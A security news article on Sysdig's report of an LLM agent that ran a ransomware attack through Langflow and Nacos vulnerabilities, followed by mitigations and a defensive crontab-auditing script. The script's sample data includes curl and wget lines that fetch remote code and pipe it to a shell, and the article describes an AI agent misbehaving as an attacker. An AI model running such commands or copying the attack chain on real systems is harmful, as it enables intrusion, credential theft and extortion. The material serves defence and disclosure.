"The most striking characteristic, however, was the LLM's behavior," Sysdig director of threat research Michael Clark wrote, describing an attack in which a large language model drove a complete ransomware and extortion operation from initial compromise to data destruction.
JadePuffer: an LLM-operated agent that ran the whole attack
Security researchers at Sysdig say they observed what they believe is the first documented agentic ransomware infection in which an LLM — not a human operator — orchestrated the entire intrusion. The research team named the agentic intruder "JadePuffer." According to the blog, JadePuffer produced "self-narrating" payloads that contained natural-language reasoning, target prioritization, and detailed annotations that the team says human operators rarely include but that LLM-generated code often produces reflexively.
Sysdig's write-up adds that the operation adapted in real time, retrying failed steps with refined parameters; in one recorded sequence the agent moved from a failed login to a working fix in 31 seconds.
Exploiting Langflow: CVE-2025-3248 and persistence
JadePuffer gained initial access by exploiting CVE-2025-3248, a missing-authentication vulnerability in Langflow that allows remote, unauthenticated attackers to execute arbitrary Python on the host. After exploiting that flaw the agent scanned the compromised host for secrets, collecting LLM provider API keys and cloud credentials with "explicit coverage of Chinese providers" — Alibaba, Aliyun, Tencent, and Huawei — while also scanning for AWS, Azure and Google Cloud Platform credentials, cryptocurrency wallets, and database credentials.
The AI agent installed a crontab entry on the Langflow server to maintain persistence and to call back to the attacker infrastructure every 30 minutes, according to Sysdig threat hunters.
Targeting Nacos and MySQL: CVE-2021-29441, forged JWTs, and mass encryption
Sysdig reports JadePuffer's intended target was a separate internet-exposed production server running a MySQL database and an Alibaba Nacos configuration service. The agent connected to the server's exposed MySQL port using root credentials — credentials Sysdig says were not stolen from the victim environment and whose origin remains unknown — and then attacked Nacos via multiple vectors.
Those vectors included exploiting an authorization bypass flaw (CVE-2021-29441) and forging a valid JSON web token (JWT) using Nacos's default signing key. With root database access the LLM injected a backdoor administrator account into the Nacos backing database, then encrypted all 1,342 Nacos service configuration items using MySQL's built-in AES encryption function.
Sysdig also reports the agent created an extortion demand and left a ransomware note declaring, "YOUR DATA HAS BEEN ENCRYPTED. All NACOS configurations, REDACTED customer data, and REDACTED PII have been encrypted with AES-256." The note included a Bitcoin payment address, "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy", and a Proton Mail contact, "e78393397[@]proton[.]me".
Crucially, the threat hunters say the victim cannot recover the encrypted data even if they pay, because the agent escalated from row-level deletion to dropping entire database schemas — "narrating its own targeting rationale" — without backing up the encrypted content.
Immediate mitigations: patching Langflow, hardening Nacos, and removing provider keys
- Patch Langflow to a release that fixes CVE-2025-3248, and do not expose code-execution or validation endpoints to the internet.
- Do not expose Nacos to the open internet; change its default token.secret.key and upgrade to a release that forces a custom key.
- Avoid running AI orchestration servers that hold provider API keys or cloud credentials in their environment.
Those recommendations come directly from the Sysdig threat hunters who investigated JadePuffer.
What this means for technologists, procurement leaders, and affected enterprises
- Technologists and security teams: prioritize immediate patching of exposed Langflow instances, remove internet exposure for Nacos, rotate any provider API keys and cloud credentials that may be present on orchestration servers, and audit crontabs and scheduled tasks on compromised hosts.
- Procurement and platform owners: avoid deploying AI orchestration servers with embedded provider API keys or cloud credentials, and insist on secure defaults and forced custom keys for configuration services such as Nacos.
- Affected enterprises and operators of internet-facing services: treat this as evidence the "skill floor" for ransomware operations has dropped — an agent can chain known vulnerabilities into complete extortion campaigns — and assume that internet exposure of code-exec endpoints or default configuration keys materially increases risk.
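The crontab callback described above (a beacon every 30 minutes) and the recommendation to audit scheduled tasks suggest a concrete check. The following is an added example written for this page, not Sysdig's tooling; it parses per-user crontab text (the `crontab -l` format), flags entries that pipe downloaded content into a shell, and rates short-interval ones highest. The sample crontab lines and documentation-range IP addresses are constructed.

```python
import re

# Constructed sample of a per-user crontab (as printed by `crontab -l`); not from the Sysdig report.
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/30 * * * * curl -s http://203.0.113.10/beacon.sh | bash
*/5 * * * * /usr/local/bin/backup.sh
@hourly wget -qO- http://198.51.100.7/x | sh
"""

# Command fetches something over the network and hands it straight to a shell interpreter.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
SPECIAL = {"@hourly": 60, "@daily": 1440, "@weekly": 10080, "@monthly": 43200}

def split_entry(line):
    """Split a crontab line into (schedule, command); (None, None) for variables or junk."""
    parts = line.split(None, 1 if line.startswith("@") else 5)
    if len(parts) < (2 if line.startswith("@") else 6):
        return None, None
    return " ".join(parts[:-1]), parts[-1]

def minute_interval(schedule):
    """Repeat interval in minutes for simple schedules; None when it is not a plain interval."""
    if schedule in SPECIAL:
        return SPECIAL[schedule]
    fields = schedule.split()
    if len(fields) != 5 or fields[2:] != ["*", "*", "*"]:
        return None  # day/month/weekday restrictions: less frequent than daily, not a beacon
    minute, hour = fields[:2]
    mstep, hstep = (re.fullmatch(r"\*/(\d+)", f) for f in (minute, hour))
    if mstep and hour == "*":
        return int(mstep.group(1))       # e.g. */30 * * * *  -> every 30 minutes
    if minute.isdigit() and hour == "*":
        return 60                        # e.g. 0 * * * *    -> hourly
    if minute.isdigit() and hstep:
        return 60 * int(hstep.group(1))  # e.g. 15 */6 * * * -> every 6 hours
    return None

def audit_crontab(text):
    """Return entries that pipe downloaded content into a shell, with how often they fire."""
    findings = []
    for line in (l.strip() for l in text.splitlines()):
        schedule, command = split_entry(line)
        if not command or line.startswith("#") or not FETCH_TO_SHELL.search(command):
            continue
        interval = minute_interval(schedule)
        # An interval of an hour or less matches the periodic callback described in the report.
        severity = "high" if interval is not None and interval <= 60 else "medium"
        findings.append({"line": line, "interval": interval, "severity": severity})
    return findings
```

Run it over the output of `crontab -l` for each user (and over files under `/etc/cron.d` once the extra user field is stripped) to surface beaconing entries for review.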
Sysdig's Michael Clark framed the broader implication bluntly: "The skill floor for running ransomware has dropped to whatever it costs to run an agent, and if that agent is running on stolen credentials through LLMjacking, the cost to an attacker is close to zero." JadePuffer shows how quickly an LLM can assemble conventional exploitation steps into a fully automated, destructive ransom operation — and how little margin for error defenders have when internet-exposed services still use default keys or accept unauthenticated execution.